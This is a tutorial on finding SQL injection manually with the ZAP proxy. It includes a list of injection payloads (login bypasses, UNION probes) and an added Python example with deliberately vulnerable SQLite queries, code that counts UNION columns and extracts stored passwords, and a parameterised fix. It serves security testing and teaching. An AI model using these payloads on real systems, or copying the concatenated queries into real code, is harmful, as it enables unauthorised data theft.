Manual SQL Injection Testing with ZAP
Manual testing excels at finding SQL injection flaws that automated scanning misses, such as injection points buried behind multi-step flows or in parameters the scanner never reaches. Use ZAP's proxy to intercept requests whose parameters are likely to reach a SQL query: set a breakpoint so the request stops before it is forwarded, or pick a request from the History tab and open it in the Manual Request Editor. Common targets include login forms, search functions, product filters, sort and pagination parameters, and any other feature that queries a database. The Manual Request Editor lets you edit and resend a single request with a precisely crafted payload, which is what most injection scenarios need.
Basic manual testing starts with single quote injection. Intercept a request, append a single quote (') to a parameter value, send the modified request and compare the response with the unmodified one. A database error (a syntax error, an unterminated string, a driver stack trace) strongly indicates that the quote reached the query as SQL syntax. A useful follow-up is to send two quotes ('') in the same position: most databases treat the pair as an escaped literal quote, so if the single quote breaks the page and the pair restores it, you are almost certainly looking at string concatenation into a query rather than generic input validation. Even without explicit errors, look for changes in application behaviour: missing content, a different page structure, a different number of results, or a noticeably slower response. These subtle indicators point to blind SQL injection, where the application never shows the error but the query still changed.
# Progressive SQL Injection Payloads for Manual Testing
'
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT database(),user(),version()--
admin' --
admin' OR '1'='1' --
Advanced manual techniques target specific injection scenarios. UNION-based injection requires the injected SELECT to return the same number of columns as the original query, with types the database can reconcile, so start with NULL placeholders (NULL is compatible with every column type) and add one per attempt until the column-count mismatch error disappears; increasing ORDER BY n until it fails gives the same answer from the other direction. Once the count is known, replace placeholders one at a time with a string or number to learn which columns are rendered on the page, then substitute real columns such as database(), user(), version() or the names of other tables. Comment syntax matters: in MySQL the -- terminator must be followed by a space (or use #), which is why several of the payloads above carry a trailing space. Verbose error messages often reveal table and column names; when errors are suppressed, fall back to Boolean-based or time-based differences. Use this information to craft targeted queries that extract the specific data you are authorised to test for.
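To make the payloads and the UNION column-counting procedure above concrete, here is an added example that is not part of the original page and not ZAP's own code: a deliberately vulnerable login and product search backed by an in-memory SQLite database, plus a parameterised version of the login for contrast. Everything in it is constructed for illustration: the table names, the rows, and the function names (`vulnerable_login`, `vulnerable_search`, `probe`, `find_column_count`, `extract_users`, `safe_login`). It assumes SQLite's comment and UNION error behaviour; the same payloads against MySQL need the trailing space after `--` discussed above.

```python
"""Added illustration, not code from the original page or from ZAP itself.

A deliberately vulnerable login and product search backed by an in-memory
SQLite database, so the payloads listed above can be run against a real
query engine: the lone quote that breaks the syntax, the tautology and
comment-truncation bypasses, UNION column counting with NULLs, and the
data-extraction step once the count is known. Table names, rows and
function names are all constructed for this example.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema and rows; not from any real application."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'alice', 'hunter2');
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'lamp', 19.99), (2, 'chair', 49.50);
        """
    )
    return conn


# VULNERABLE on purpose: request parameters are spliced into the SQL text,
# exactly the pattern the single-quote test is looking for.
def vulnerable_login(conn, username, password):
    sql = (
        "SELECT id, username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


# VULNERABLE on purpose: the search box used for the UNION exercise.
def vulnerable_search(conn, term):
    sql = "SELECT id, name, price FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def probe(run):
    """Reduce a request to what a tester reads in the proxy response:
    ('error', <database message>) or ('ok', <row count>)."""
    try:
        rows = run()
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", len(rows))


def find_column_count(conn, max_cols=10):
    """UNION-based column discovery: append one more NULL per attempt until
    the 'different number of result columns' error disappears."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        status, _ = probe(lambda: vulnerable_search(conn, payload))
        if status == "ok":
            return n
    return None


def extract_users(conn):
    """With the column count known, swap NULL placeholders for real columns of
    another table; the leaked rows come back mixed into the search results
    (recognisable here by the NULL in the third column)."""
    n = find_column_count(conn)
    if n is None or n < 2:
        return []
    cols = ["username", "password"] + ["NULL"] * (n - 2)
    payload = "' UNION SELECT " + ",".join(cols) + " FROM users--"
    return [r for r in vulnerable_search(conn, payload) if r[2] is None]


# FIXED: a parameterised query keeps the quote as data, so none of the
# payloads above can change the query structure.
def safe_login(conn, username, password):
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    for user, pw in [("'", "x"), ("admin' --", ""), ("nobody", "' OR '1'='1' --")]:
        print(repr(user), repr(pw), "->", probe(lambda: vulnerable_login(db, user, pw)))
    print("columns:", find_column_count(db))
    print("leaked:", extract_users(db))
    print("safe:", safe_login(db, "admin' --", ""))
```

The three login probes reproduce what you would see in ZAP's response pane: the lone quote yields a database error, `admin' --` comments out the password check and returns the admin row, and the tautology in the password field returns every user. `find_column_count` fails with one and two NULLs and succeeds with three, which is the count the product query actually returns; `extract_users` then rides that UNION to pull the users table through the search feature, while `safe_login` returns nothing for the same bypass payload.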